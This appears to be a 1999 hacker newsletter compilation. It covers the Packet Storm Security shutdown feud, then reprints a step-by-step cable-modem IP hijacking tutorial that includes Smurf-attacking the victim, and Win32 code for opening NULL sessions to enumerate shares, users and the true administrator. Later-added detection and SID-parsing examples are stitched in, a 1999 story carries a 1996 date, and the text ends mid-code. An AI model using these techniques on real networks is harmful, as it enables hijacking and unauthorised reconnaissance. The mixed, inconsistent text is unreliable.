       If that's not enough to annoy me, all of my class work for 
       the class I'm taking at NCSU this summer (CSC499 Independent 
       Research project involving IDS) is/was on that server at 
       Harvard and gone now too.  With 4 weeks left in the semester 
       here at NCSU, I have just lost seven weeks of work and data 
       that cannot be replaced in 4 weeks.  
       What bothers me the most is that all of the countless hours I
       put into that web site and the archives, thousands of hours,
       are gone now, for good.
       The site was getting over 400,000 hits/day and doing about
       10 GB/day in transfers, so I don't see it coming back online
       even if I do get any of the site content back.
       Obviously, I have taken full responsibility for the site
       content and all activities and events associated with that 
       server.  Even though no laws or rules were broken, on my part,
       and to my knowledge, I am now facing possible legal action 
       from both JP and Harvard, and state/federal computer crime 
       charges as well.  
       What am I going to do now?  I don't know.  The web site I
       devoted most of my waking hours to is gone.  My chances of
       passing my CSC499 class do not look good, according to the 
       negative comments from my professor.  I'll try to salvage
       the summer's worth of course work anyway if possible and pass.  
       Until formal charges are filed, I've still got my job and 
       account here at NCSU.  When NCSU catches wind of this, and 
       I'm sure they will, my account probably will be permanently 
       revoked, and my job and the past three years of school will 
       then be gone too.  Until then, I can be contacted at the email 
       address in the sig below.
       Check out the news and history of John Vranesevich and 
       Carolyn Meinel's smear and harassment campaigns that have ruined 
       the careers and lives of many people, mine included. has all of the details.
       Funny how I spent the past few years donating my time, literally
       thousands and thousands of hours, to "the security community", 
       never asking for or making a single penny off the time and work 
       I invested, and have now lost it all because John Vranesevich 
       and a few of his IRC friends are able to make quick phone calls, 
       fabricate absurd stories about criminal activity, libel, threaten 
       to sue Harvard, and I don't even get to plead my case.  I am 
       guilty without even being informed of what was going on.
       He has effectively ruined years of my work, my education, my 
       career, my life.  
       There are really only four things that I'd like right now:
       1. Justice
       2. Truth
       3. The 3 GB of MY data that Harvard has and refuses to turn 
          over to me
       4. A job in the IT/IS/IW industries - the pay doesn't even matter,
          I'm willing to move, I'm willing to put in 60-80 hour weeks.
          Just give me a UNIX or Linux box to work from.
       I'll settle for just the job though, and like I said, the pay 
       doesn't matter - I love computers, network security, and systems 
       administration.  If I was not doing it for pay, I'd be doing it 
       for free.
       See you at BlackHat and DEFCON.
       take it easy,
       Ken Williams
       if you need to reach me by phone, email me at
       and CC the email to with phone # request.
       my pgp keys are available on all of the regular keyservers, and at
       [Note: yes, you can quote or print any part of or the whole email.]
       Ken Williams
       Packet Storm Security               
       -----BEGIN PGP SIGNATURE-----
       Version: PGPfreeware 5.0i for non-commercial use
       Charset: noconv
       -----END PGP SIGNATURE-----

       Net Thug Shuts Down Largest Free Security Site
       Wed Jun 30 16:36:10 MDT 1999
       ATTRITION Staff
       Earlier today, the PacketStorm Security site was abruptly shut down
       with no warning. PacketStorm (
       was one of the largest and most respected sites catering to security
       professionals worldwide. Boasting an average of 400,000 hits a day,
       pushing out roughly 10 gigs of traffic, the site was a valuable resource 
       to an estimated 10,000 security professionals world wide.
       The security resource did not suffer at the hands of hackers or 
       network intruders. Instead, a new kind of malicious criminal found 
       success through a fear that haunts more and more Americans today.
       A single piece of email from John Vranesevich (founder of AntiOnline)
       to the educational institution hosting Packetstorm threatened a lawsuit if 
       the site was not shut down. Harvard said there were "numerous" complaints,
       but provided no additional details.
       Like most US institutions, the idea of being dragged to court for any 
       reason is enough to scare them into hasty action. With that mail, 
       Harvard pulled the plug. This decision was no doubt made as an easy 
       alternative to spending time and resources  fighting the claims.
       Email from Ken Williams, primary administrator for the site, to Attrition
       staff indicated that not only did Harvard shut down the site, they denied 
       him access to the machine and all information stored on it. The correspondence
       noted the likelihood that all information on the machine, and all
       backups would be destroyed in order to avoid the AntiOnline lawsuit.
       "All of the content and the backups made are either destroyed, being
       destroyed now, or will be before I can do anything to prevent it." said
       PacketStorm founder Ken Williams.
       Williams went on to say that he does not fear any fraudulent lawsuit
       Vranesevich could attempt to level at him. The information contained
       on the site regarding Vranesevich was not in violation of any US law
       that he was aware of, and had been there for over a year. Along with
       the security site, months of Williams' own school work was lost. 
       "I have just lost seven weeks of [class] work and data that cannot be 
       replaced in 4 weeks." Williams said, referring to deadlines on the
       school work.
               "What bothers me the most is that all 
                of the countless hours I put into
                that web site and the archives, thousands 
                of hours, are gone now, for good."
                       - Ken Williams, PacketStorm founder
       These vague and unfounded legal threats only serve to hurt the security
       community. AntiOnline's mission statement claims they exist "to educate
       the public on computer security related issues." Apparently, this
       mission statement forgot to include such things like "educate the public
       through OUR site only" and "as long as we profit from it".
       JP has since offered this news:
       ( Likely suffering major DoS attacks as a result of their actions, I was unable
         to get thru to the site to read their shit for posting here...they will burn
         in hell for this action - Ed )
       Ok I cut thru the cruft, here's JP's 'story';
       PacketStorm Is Shut Down
       An AntiOnline Editorial
       Thursday , July 01 1999
       Apparently for some time now, PacketStorm Security, a popular underground collection of security related tools and information, has been maintaining a vast archive of
       materials about AntiOnline. These materials included entire stories, copies of the weekly mailbag, e-mails, and other materials copyrighted by AntiOnline LLP.
       On top of that, and what was far more serious, the site contained dozens and dozens of items which included: e-mails, messages, documents, images, and even public
       surveys. These materials were libelous, and in some cases, were blatant threats against members of my immediate family, myself, and my company.
       While I value the right to free speech as much, if not more, than the average American, I do not believe in individuals posting threatening and harassing documents about
       another individual, and their family members. It was for this reason, and no other, that I contacted Harvard University, which was hosting the PacketStorm Website, and
       requested that it be shut down. I did not threaten legal action, but simply directed University Administration to the website, for them to view, and to judge, on their own.
       Below is a copy of that letter:
       May I first say that I did my best to see that this letter got sent to the appropriate individuals.  I had some difficulty determining who those individuals may be,
       so if I have made an error, I would greatly appreciate it if you would forward this letter on to the appropriate individual(s).
       My name is John Vranesevich, and I am the Founder and General Partner of AntiOnline LLP, a computer security company based outside of Pittsburgh, PA.
       Earlier today, one of my colleagues forwarded me the following URL:
       Needless to say, I was shocked and outraged at what I saw.  This page contains a large archive of libelous and, to put it bluntly, sick material.  Everything
       from archives of copyrighted material from our website, to altered pictures of my family, to 'stories' about me which contain images ranging from people
       engaged in homosexual activities, to a nun that appears to be covered in seminal fluid.
       I am astounded that an institution as prestigious Harvard would be party to the dissemination of this type of material.  It is my hope that the University
       Administration was unaware of this site, and now that it has been brought to their attention, it is my hope that it will be dealt with promptly.
       I have worked to help several educational institutions develop 'Acceptable Use Policies', and if Harvard is similar to them, the above URL would be a clear
       violation of that policy. 
       It is my hope that the above mentioned domain will be shut down immediately, and that the individual responsible will be seriously reprimanded.
       I hope to hear from you soon about this matter, and what you may have done regarding it.
       Yours In CyberSpace,
       John Vranesevich
       Founder, AntiOnline
       Tonight, Ken Williams, the founder of Packet Storm Security, released a letter to the public. The letter read in part:
       Funny how I spent the past few years donating my time, literally thousands of hours, to "the security community", never making even a penny off the time and
       work I invested, and have now lost it all because some asshole named John Vranesevich is able to make a quick phone call, fabricate absurd stories about
       criminal activity and bullshit I never did, and effectively ruin years of work, my education, my career, my life. 
       Ken, I know what it's like to dedicate many, many, thankless hours into a project, believe me. But, you did not lose your site because of me, you lost it because of you. I
       could not stand by and watch your site be used as a platform to harass and threaten my family, myself, and the business which I have worked hard to start. While you,
       and others who 'follow you' may criticize me for what I did, I think everyone that's reading this, who has family members that they love, and a career that they enjoy, will
       admit to themselves that if in my shoes, they would have done at least the same. I hold absolutely no grudge towards you as a person, and I hope that you have the best
       of success in all that you do.
       Due to the types of threats that I have been receiving, and that sites like PacketStorm have been propagating, local law enforcement agencies were put on alert, and
       began doing extensive extra patrolling of the residence of my family members, my own residence, and the AntiOnline Offices. I realize that the actions that I have taken
       against PacketStorm may greatly increase the immediate threat against my family, myself, and my company; and that the harassment will now only get worse. However,
       I will not allow my family, myself, nor my company to become a victim. I am standing my ground, and will continue AntiOnline's mission of putting an end to malicious
       People in this country have the right to say and do whatever they please, unless that is, what they say and do infringes on the rights of another - anonymous.
       Yours In CyberSpace,
       John Vranesevich
       Founder, AntiOnline
       Packetstorm mirror site announced at HNN: 
       " Support for Ken Williams Continues to Grow 

         contributed by Space Rogue 
         The outpouring of support for Ken Williams and Packet
         Storm Security has been phenomenal. One such item of
         support has been the beginning of an effort to rebuild
         PSS from scratch as a grassroots effort. The organizer
         of this is asking anyone who ever downloaded a file form
         PSS to upload it here. 

         PacketStorm Mirror 
       Statement from Harvard:

       * S T A T E M E N T * 

       As a service to the Internet community, Harvard agreed
       to host a Packet Storm Security Website for
       security-related materials only. Without Harvard's
       knowledge, unrelated content was put on the Harvard
       server, including sexually-related material and personal
       attacks on an individual not affiliated with the University.
       A Harvard administrative site focused on security issues is
       not the forum for this type of material. We are returning
       the content on the site and hope that Packet Storm will
       make its security tools available through its own Website. 

       Joe Wrinn
       Office of News and Public Affairs

       Joe Wrinn
       Director, Harvard News Office
       1350 Massachusetts Ave., Rm. 1060
       Cambridge, MA 02138     
       Ken's Rebuttal to the Harvard statement;
       Date: 7/1/99 17:58
       Received: 7/1/99 18:01
       From: Ken Williams,


       [The Harvard] statement is incorrect, and even libelous
       itself by implying that I had "sexually related materal" on
       the server. I NEVER did! 

       NOW, I will retain legal counsel. This is outrageous! 
       I wouldn't have been surprised to find myself slandered by
       John Vranesevich and AntiOnline, but to have Harvard
       implicitly state that I was serving up "sexually related
       material" to the Internet is absurd, libelous, and legally

       Are you, Harvard, trying to ruin my reputation and career
       now too? 

       It sounds to me like you are fabricating this "sexually
       related material and personal attacks" statement to
       appease your critics, and, as I (now ominously) mentioned
       in my first open letter, trying to use me as the fall guy. 


       Ken Williams 
       ZDNN: Harvard caught in hacker crossfire
       Tue, 01 April 1996 18:29:02 GMT

       Harvard University is caught in the middle of an online war between hacking-scene
       follower and the hacking community at large.
       On Wednesday, the Cambridge, Mass., university removed an independent security 
       Web site, known as Packet Storm, which it had been mirroring on its servers for only 10 days. 
       The reason: A directory of material hidden in the Web site, and thus on Harvard's servers, that
       had "sexually related material and personal attacks on an individual not affiliated with the 
       University," said Joe Wrinn, director of news and public affairs for Harvard, in a statement 
       released by Harvard on Thursday.

       "We agreed to have a site that had security-related materials only," said Wrinn. "Both parties
        involved were using us in a way that was completely inappropriate."
       Ken Williams, a North Carolina State University employee and the Webmaster of Packet Storm, angrily
       refuted the allegations.

       "This statement is incorrect, and even libelous itself by implying that I had 'sexually related 
       material' on the server," he wrote in an e-mail. "I never did!"

       According to Williams, the directory -- labeled "/jp" because it was a collection of material 
       satirizing AntiOnline founder and chief John P. Vranesevich -- had a parody of the AntiOnline site. 
       But others familiar with the site said that the parody also contained photos of nude women that were 
       intended to be more sarcastic than sexual. Harvard obviously didn't get the joke. Harvard's Wrinn did
       not know specifically what sort of "sexual" content was contained on the site. 

       Harvard in the hot seat

       "We are in the middle of this and it's inappropriate," said Harvard's Wrinn, sounding distinctly 
       uncomfortable with the attention that the issue was attracting. Harvard intends to send the complete
       contents of the site back to Williams so that he can post it elsewhere.
       No wonder: Packet Storm wasn't just a small-time site -- it had been the place to go for both hackers
       and security experts to get up-to-date security information.

       "Packet Storm was a huge compilation of security tools," said Brian Martin, known as "Jericho," one of
       the Webmasters at hacker news and information site "It was updated daily with tools. It
       was always there." 

       Among organizations that used and mirrored the site: The Department of Defense and the Federal Bureau of
       Investigation, claimed Webmaster Williams.
       'I didn't have an anti-J.P. Temple of Hate'
       Yet, Williams had also sided with many others in hacker circles who have been waging a war -- of mainly 
       words -- against AntiOnline's Vranesevich and his latest ally, Carolyn Meinel, security researcher and 
       webmaster of The Happy Hacker.

      "I didn't have an anti-J.P. Temple of Hate or anything," said Williams. "But there are companies, 
      organizations, and individuals out there that [we believe] are black-eyes of the industry."

      So, Williams attached a non-public directory to the Web site that archived parodies and criticisms of 
      AntiOnline's founder. 

      The directory represented a single facet of a complex war of image in the hacker not-so-underground. For the
      most part, AntiOnline and its main foe,, have squared off with conflicting allegations of slander,
      libel and plagiarism. 
      ' I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a 
      potential suit.'
      "I can understand a parody -- I have no problem with that," said the 20-year-old Pennsylvania Webmaster, adding 
      that he thought Williams acknowledged that the photos had been put up, but that since they had come from a source
      already online, the Packet Storm Webmaster thought the pictures were fair game.

      Vranesevich's answer? The Webmaster notified Harvard of the hidden directory in a letter to the university's provost
      -- and Harvard quickly took the site down.

      Did Harvard act too quickly?

      B.K. DeLong, a Boston-based computer security consultant, thought Harvard acted too quickly.

      "I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential
       suit," he said. Yet Harvard wasn't the only one to act quickly. By late Wednesday night, the Keebler Elves -- the 
       cybergang that claimed responsibility for hacking into the National Oceanic and Atmospheric Administration last week
        -- defaced another government Web site with the news.

     "Now, because of JP ... Packetstorm is no more, and never will be again," the site 

      Unnamed hackers also struck at AntiOnline more directly. AntiOnline's site came under a denial-of-service attack -- 
      which floods a particular site with random data -- so severe that its Internet service provider pulled the site for 
      almost 12 hours on Thursday, said Vranesevich.
      Ugly threats

      Other attacks were even less friendly. "I have received more death threats in the last 24 hours by phone, than I have 
      in five years," he said.

      Not quite an apology, Vranesevich added that he never intended the entire Packet Storm site to be taken down.

      "I know what it's like to have the university stomp its foot down on you. When I was a student at the University of 
      Pittsburgh, I had my Web site shut down," he said. "But I never threatened anyone."

      In his mind, the contents of "/jp" did.
 03.0 Cable Modem Hijacking from
      Snarfed from PacketStorm Security:
      Cable Modem IP Hijacking in Win95/98
       The purpose of this is to show you how bad cable modem security is, and that 
       even from a Windows box you can take someone else's IP. You can hijack IPs 
       over a cable modem, and it is very simple in any operating system.
       Just follow the steps:
       1) Choose someone's IP that you wish to have. Make sure the IP is on the same 
       network. Most cable modem providers use DHCP. The first thing you have to do is 
       find the victim's IP. Remember the victim's IP has to be on the same network and 
       with the same service provider for this to work.
       2) Now this is probably the hardest thing in this file (but it's still easy): 
       you have to wait until the victim's computer is off, or you can Smurf-kill his 
       connection. When you think his computer is offline, ping it to see 
       if you get a response. Do this by going to a DOS prompt and typing ping 
       (victim's IP). If you get a response then you have to try harder.
       After you get his PC offline, go into your network properties and edit 
       the IP settings, but instead of having yours there you put the victim's IP, 
       host, and domain.
       3) Restart. If you restart and you get an IP conflict, this means that the 
       victim's computer is on; if you don't get an IP conflict, open your 
       web browser and see if it works. With some cable modem providers you might have 
       to also add the Gateway, Subnet mask (, Host, DNS search, and 
       Now you can go. Everything will work until the victim's PC is back on. Once it 
       is back online it will take the IP away, because it will tell you that you have 
       the wrong MAC address.
       This is also possible in Linux, but that is not the best way there. You can 
       instead change your MAC address to the victim's, which is more secure (for you) 
       and much easier. There are a couple of scripts to change your address; just 
       look around.
       Warning: Some cable modem service providers will know when you're using the 
       wrong IP, but hey, it might be useful.
       Copyright (c) 1999 Wildman
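       The article's own caveat is the interesting part for anyone on the defending side: the
       theft only holds while the victim is off the wire, and the moment the victim returns both
       machines answer for the same address, which is what Windows reports as an "IP conflict"
       and what a provider can notice too. On a shared cable segment that conflict is visible in
       ARP traffic as one IP being claimed by two different MACs. The C++ program below is an
       added example, not part of Wildman's text: it parses raw Ethernet/ARP frames and raises an
       alert when an IP that was already spoken for is claimed by a different MAC. The frames,
       the two MAC addresses and the 24.1.2.50 address are constructed sample data.

```cpp
#include <array>
#include <cstdint>
#include <cstdio>
#include <map>
#include <string>
#include <vector>

typedef std::array<uint8_t, 6> Mac;

// Fields we need from one Ethernet/ARP frame.
struct ArpInfo {
    uint16_t opcode = 0;   // 1 = request, 2 = reply
    Mac senderMac{};
    uint32_t senderIp = 0; // host byte order
};

// Parse a 42-byte Ethernet + ARP frame (IPv4 over Ethernet only). Returns false for
// anything else instead of reading fields that are not there.
bool parseArp(const std::vector<uint8_t>& f, ArpInfo& out) {
    if (f.size() < 42) return false;
    if (f[12] != 0x08 || f[13] != 0x06) return false;                        // EtherType ARP
    if (f[14] != 0 || f[15] != 1 || f[16] != 8 || f[17] != 0) return false;  // htype Ethernet, ptype IPv4
    if (f[18] != 6 || f[19] != 4) return false;                              // hlen, plen
    out.opcode = uint16_t((f[20] << 8) | f[21]);
    for (int i = 0; i < 6; ++i) out.senderMac[i] = f[22 + i];
    out.senderIp = (uint32_t(f[28]) << 24) | (uint32_t(f[29]) << 16) |
                   (uint32_t(f[30]) << 8) | uint32_t(f[31]);
    return true;
}

std::string macStr(const Mac& m) {
    char buf[18];
    std::snprintf(buf, sizeof buf, "%02x:%02x:%02x:%02x:%02x:%02x",
                  unsigned(m[0]), unsigned(m[1]), unsigned(m[2]),
                  unsigned(m[3]), unsigned(m[4]), unsigned(m[5]));
    return buf;
}

std::string ipStr(uint32_t ip) {
    char buf[16];
    std::snprintf(buf, sizeof buf, "%u.%u.%u.%u",
                  unsigned(ip >> 24), unsigned((ip >> 16) & 255),
                  unsigned((ip >> 8) & 255), unsigned(ip & 255));
    return buf;
}

// Remembers which MAC first spoke for each IP; a later claim on the same IP from a
// different MAC is the "IP conflict" the article describes, seen from the wire.
class ArpWatch {
    std::map<uint32_t, Mac> owner_;
public:
    std::vector<std::string> alerts;
    void observe(const std::vector<uint8_t>& frame) {
        ArpInfo a;
        if (!parseArp(frame, a)) return;
        auto it = owner_.find(a.senderIp);
        if (it == owner_.end()) { owner_[a.senderIp] = a.senderMac; return; }
        if (it->second != a.senderMac)
            alerts.push_back(ipStr(a.senderIp) + " claimed by " + macStr(a.senderMac) +
                             " (was " + macStr(it->second) + ")");
    }
};

// Build a broadcast ARP reply announcing (mac, ip). Constructed sample data, not a capture.
std::vector<uint8_t> arpReply(const Mac& mac, uint32_t ip) {
    std::vector<uint8_t> f(42, 0);
    for (int i = 0; i < 6; ++i) { f[i] = 0xff; f[6 + i] = mac[i]; f[22 + i] = mac[i]; }
    f[12] = 0x08; f[13] = 0x06;          // ARP
    f[15] = 1; f[16] = 8;                // Ethernet, IPv4
    f[18] = 6; f[19] = 4;                // hlen, plen
    f[21] = 2;                           // reply
    f[28] = uint8_t(ip >> 24); f[29] = uint8_t(ip >> 16);
    f[30] = uint8_t(ip >> 8);  f[31] = uint8_t(ip);
    return f;
}

// Replay: the victim speaks for 24.1.2.50, then the hijacker from step 2 claims it too.
std::vector<std::string> runScenario() {
    const uint32_t victimIp = (24u << 24) | (1u << 16) | (2u << 8) | 50u;
    const Mac victim = {0x00, 0x10, 0x4b, 0x11, 0x22, 0x33};   // made-up addresses
    const Mac thief  = {0x00, 0xa0, 0xc9, 0x44, 0x55, 0x66};
    ArpWatch w;
    w.observe(arpReply(victim, victimIp));
    w.observe(arpReply(victim, victimIp));   // same owner again: no alert
    w.observe(arpReply(thief, victimIp));    // different MAC, same IP: alert
    return w.alerts;
}
```

       Any C++11 compiler builds it; runScenario() returns exactly one alert, for the hijacker's
       frame. The blind spot is the one the article itself points at: if the hijacker clones the
       victim's MAC as well (the Linux variant), IP-to-MAC watching sees nothing, and detection
       has to move to the provider's side, which knows which modem each address arrived through.
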
 04.0 Exploiting Null Session Weaknesses in NT environment
      Snarfed from PacketStorm Security:
                     Details About NULL Sessions

     This page is a detailed explanation of how to programmatically connect to NT Server NULL sessions and extract the name of the true
     administrator account. Even non-programmer admins should read through this and become familiar with the APIs explained, in order to
     better understand the NT environment and recognize code that might be used against them.

     The original purpose of NULL sessions is to allow unauthenticated hosts to obtain browse lists from NT servers and participate in MS
     networking. Mostly this is useful for Win95/98/NT hosts that are not domain members but still need to obtain browsing information. 

     The problem occurs where a NULL session becomes included in the Everyone group and so gains access to resources for which it was
     never authenticated, but which the Everyone group had been granted permissions on. Originally, 'Everyone' did not mean 'anyone': you
     still had to log on to be in the Everyone group. NULL sessions, however, are the one case where 'Everyone' can mean 'anyone'. This is
     the reason MS created the *NEW* Authenticated Users group. The Authenticated Users group does not include NULL sessions and so can
     never mean 'anyone' - until someone finds an exploit.

     The following code segments are commented to show exactly what is happening, which APIs are being used, and how the true
     administrator name can be identified.

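     How the true administrator gets identified: renaming the Administrator account changes its name but not its SID, and the built-in
     Administrator always carries RID 500 as the last subauthority of the machine or domain SID. An enumeration that pairs each account
     name with its SID (LookupAccountName returns the SID as a binary blob) can therefore name it whatever it has been renamed to. The
     listing on this page is cut off before that step, so what follows is an added example rather than NTOHunter's code: it parses the
     binary SID layout the Win32 API hands back and picks the RID-500 account out of a constructed account list. It is plain C++ with no
     Win32 dependency, so it builds on any platform; the account names and the domain SID are made up.

```cpp
#include <cstddef>
#include <cstdint>
#include <sstream>
#include <stdexcept>
#include <string>
#include <vector>

// Parsed form of a Windows SID, i.e. the binary blob LookupAccountName fills in:
//   byte 0      revision (always 1)
//   byte 1      number of subauthorities
//   bytes 2-7   48-bit identifier authority, big-endian (5 = NT AUTHORITY)
//   then        count x 4-byte little-endian subauthorities; the last one is the RID
struct Sid {
    uint8_t revision = 0;
    uint64_t authority = 0;
    std::vector<uint32_t> subauth;
};

// Parse a binary SID, rejecting anything that would make us read past the buffer.
Sid parseSid(const std::vector<uint8_t>& b) {
    if (b.size() < 8) throw std::runtime_error("SID too short");
    Sid s;
    s.revision = b[0];
    std::size_t count = b[1];
    if (s.revision != 1 || count == 0 || count > 15) throw std::runtime_error("bad SID header");
    if (b.size() != 8 + 4 * count) throw std::runtime_error("SID length mismatch");
    for (int i = 0; i < 6; ++i) s.authority = (s.authority << 8) | b[2 + i];
    for (std::size_t i = 0; i < count; ++i) {
        std::size_t off = 8 + 4 * i;
        s.subauth.push_back(uint32_t(b[off]) | (uint32_t(b[off + 1]) << 8) |
                            (uint32_t(b[off + 2]) << 16) | (uint32_t(b[off + 3]) << 24));
    }
    return s;
}

// Render in the familiar S-1-5-21-...-RID form (what ConvertSidToStringSid would give).
std::string sidToString(const Sid& s) {
    std::ostringstream o;
    o << "S-" << int(s.revision) << "-" << s.authority;
    for (uint32_t v : s.subauth) o << "-" << v;
    return o.str();
}

uint32_t rid(const Sid& s) { return s.subauth.back(); }

// The built-in Administrator is the account under the machine/domain SID (S-1-5-21-a-b-c)
// whose RID is 500, whatever its name currently is.
bool isBuiltinAdministrator(const Sid& s) {
    return s.authority == 5 && s.subauth.size() == 5 && s.subauth[0] == 21 && rid(s) == 500;
}

struct Account {
    std::string name;
    std::vector<uint8_t> sid;   // as returned by LookupAccountName
};

// Build the binary form of S-1-5-21-a-b-c-r (constructed test data, not from a real host).
std::vector<uint8_t> makeDomainSid(uint32_t a, uint32_t b, uint32_t c, uint32_t r) {
    std::vector<uint8_t> out = {1, 5, 0, 0, 0, 0, 0, 5};
    for (uint32_t v : {21u, a, b, c, r})
        for (int i = 0; i < 4; ++i) out.push_back(uint8_t(v >> (8 * i)));
    return out;
}

// Given the (name, SID) pairs an enumeration produced, return the real Administrator's
// name, or "" if no RID-500 account was in the list.
std::string findTrueAdministrator(const std::vector<Account>& accounts) {
    for (const Account& a : accounts)
        if (isBuiltinAdministrator(parseSid(a.sid))) return a.name;
    return "";
}

// Constructed sample: "Administrator" is a decoy with an ordinary RID, and the account
// that really is the built-in Administrator has been renamed "svc_backup".
std::vector<Account> sampleAccounts() {
    const uint32_t a = 1004336348, b = 1177238915, c = 682003330;   // made-up domain SID
    return {
        {"Administrator", makeDomainSid(a, b, c, 1001)},
        {"svc_backup",    makeDomainSid(a, b, c, 500)},
        {"Guest",         makeDomainSid(a, b, c, 501)},
    };
}
```

     findTrueAdministrator(sampleAccounts()) returns "svc_backup", not "Administrator"; the same check applied to a real enumeration over a
     NULL session is why renaming the account buys nothing against this class of tool. parseSid refuses short or inconsistent blobs rather
     than reading off the end of them, which matters when the bytes come from a remote host.
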
     First - making a  NULL Session connection

     One way to do this is by using the Net Use command with an empty password. Programmatically, it looks like this:

     //This function is called from the dialog that fills the tree control with connection results

     BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
     {
         //Setup for UNICODE
         char* pTemp = TargetHost.GetBuffer(256);
         WCHAR wszServ[256];
         LPWSTR Server = NULL;

         //Convert to Unicode
         MultiByteToWideChar(CP_ACP, 0, pTemp,
                             strlen(pTemp)+1, wszServ,
                             sizeof(wszServ)/sizeof(wszServ[0]) );
         TargetHost.ReleaseBuffer();   //done with the raw buffer

         //Create the IPC$ share connection string we need
         Server = wszServ;

         LPCWSTR szIpc = L"\\IPC$";
         WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
         DWORD dwServNameLen;
         DWORD dwRC;

         //Setup Win32 structures and variables we need
         NET_API_STATUS nas;

         USE_INFO_2 ui2;
         SHARE_INFO_1* pSHInfo1 = NULL;
         DWORD dwEntriesRead = 0;
         DWORD dwTotalEntries = 0;

         //Handles to the tree control nodes the connection results are inserted under
         HTREEITEM machineRoot = NULL, shareRoot = NULL, userRoot = NULL, adminRoot = NULL, attribRoot = NULL;

         char sharename[256];
         char remark[256];

         if(Server == NULL || *Server == L'\0')
             return FALSE;

         dwServNameLen = lstrlenW( Server );

         //Normalise the target to \\server form: prepend the UNC slashes if the caller left them out
         if(Server[0] != L'\\' && Server[1] != L'\\')
         {
             // prepend slashes and NULL terminate
             RemoteResource[0] = L'\\';
             RemoteResource[1] = L'\\';
             RemoteResource[2] = L'\0';
         }
         else
         {
             dwServNameLen -= 2; // drop slashes from count
             RemoteResource[0] = L'\0';
         }

         if(dwServNameLen > CNLEN)
             return FALSE;

         if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
         if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;   //now \\server\IPC$

         //Start with clean memory
         ZeroMemory(&ui2, sizeof(ui2));
         //Fill in the Win32 network structure we need to use the connect API
         ui2.ui2_local = NULL;
         ui2.ui2_remote = (LPTSTR) RemoteResource;
         ui2.ui2_asg_type = USE_IPC;
         ui2.ui2_password = (LPTSTR) L"";   //SET PASSWORD TO NULL - empty user name plus empty password is what makes this a NULL session
         ui2.ui2_username = (LPTSTR) L"";
         ui2.ui2_domainname = (LPTSTR) L"";

         nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
         dwRC = GetLastError();
         if( nas != NERR_Success )
         {
             //No NULL session: host unreachable, or anonymous access is restricted on the target
             SetLastError( nas );
             return FALSE;
         }

         machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT, TVI_LAST);

         //Enumerate the share list over the NULL session
         nas = NetShareEnum(Server, 1, (LPBYTE*)&pSHInfo1, MAX_PREFERRED_LENGTH,
                            &dwEntriesRead, &dwTotalEntries, NULL);
         dwRC = GetLastError();
         if( nas == NERR_Success )
         {
             shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot, TVI_LAST);
             userRoot  = pDlg->m_Victims.InsertItem("Users",  machineRoot, TVI_LAST);
             adminRoot = pDlg->m_Victims.InsertItem("Admin",  machineRoot, TVI_LAST);

             for(int x=0; x<(int)dwEntriesRead; x++)
             {
                 // Convert back to ANSI
                 WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)pSHInfo1[x].shi1_netname, -1,
                                     sharename, 256, NULL, NULL );
                 WideCharToMultiByte(CP_ACP, 0,
                                     pSHInfo1[x].shi1_remark ? (LPCWSTR)pSHInfo1[x].shi1_remark : L"", -1,
                                     remark, 256, NULL, NULL );
                 CString ShareDetails = sharename;
                 ShareDetails = ShareDetails + " - " + remark;
                 //fill the tree with connect info
                 attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot, TVI_LAST);
             }

             //My wrapper function for listing users - see below
             DoNetUserEnum(Server, pDlg, userRoot, adminRoot);
         }

         if( pSHInfo1 != NULL )
             NetApiBufferFree(pSHInfo1);   //NetShareEnum allocated this buffer for us

         //Tear the NULL session down again
         nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

         SetLastError( nas );
         return TRUE;
     }

     The following function is how one can programmatically determine the administrator status of an account......

     bool GetAdmin(char* pServer, char* pUser, CString& Name)
     {
         DWORD dwDomainName, dwSize, dwAdminVal;
         SID_NAME_USE use;
         PSID pUserSID = NULL;      // SID for user
         char szDomainName[256];    // domain (or machine) the account resolved against
         int rc;
         int iSubCount;

         bool bFoundHim = false;
         dwDomainName = sizeof(szDomainName);
         dwSize = 0;
         dwAdminVal = 0;
         iSubCount = 0;

         //Call API for buffer size since we don't know size beforehand
         LookupAccountName(pServer, pUser, pUserSID,
                           &dwSize, szDomainName,
                           &dwDomainName, &use );
         rc = GetLastError();

         //Anything other than "buffer too small" means the name did not resolve
         if(rc != ERROR_INSUFFICIENT_BUFFER)
             return false;

         //Allocate a buffer of the size the API asked for
         pUserSID = (PSID) malloc(dwSize);
         if(pUserSID == NULL)
             return false;

         //Repeat call now that we have the right size buffer
         dwDomainName = sizeof(szDomainName);
         if(!LookupAccountName(pServer, pUser, pUserSID,
                               &dwSize, szDomainName,
                               &dwDomainName, &use ))
         {
             free(pUserSID);
             return false;
         }

         //Scan the SID for the golden key - the built-in Administrator always carries RID 500,
         //no matter what the account has been renamed to

         //Get a count of sub-authorities
         iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));
         //The RID is the last sub-authority
         dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));

         if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN
         {
             Name.Format("Admin is %s\\%s\n", szDomainName, pUser);
             bFoundHim = true;
         }

         free(pUserSID);      //allocated with malloc, so free() rather than delete
         return bFoundHim;    //WE KNOW WHO HE IS, THE CALLER ADDS HIM TO THE TREE
     }
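     The RID 500 test that GetAdmin() performs with LookupAccountName and GetSidSubAuthority, as an added example that is not part of
     the NT OBJECTives code above: it works on SIDs in their textual S-1-5-... form, so it runs anywhere (Python here rather than Win32
     C++), and it also shows why the bare "last sub-authority == 500" test is better tied to the target's own S-1-5-21 prefix, so that a
     BUILTIN alias or a trusted domain's Administrator is not mistaken for the local one. The account names, the domain SID and the
     renamed-Administrator scenario are constructed for this example.

```python
"""
Added example (not part of the NT OBJECTives code): the GetAdmin() RID-500 test on textual
SIDs. Account names, the domain SID and the scenario below are constructed for illustration.
"""
from __future__ import annotations

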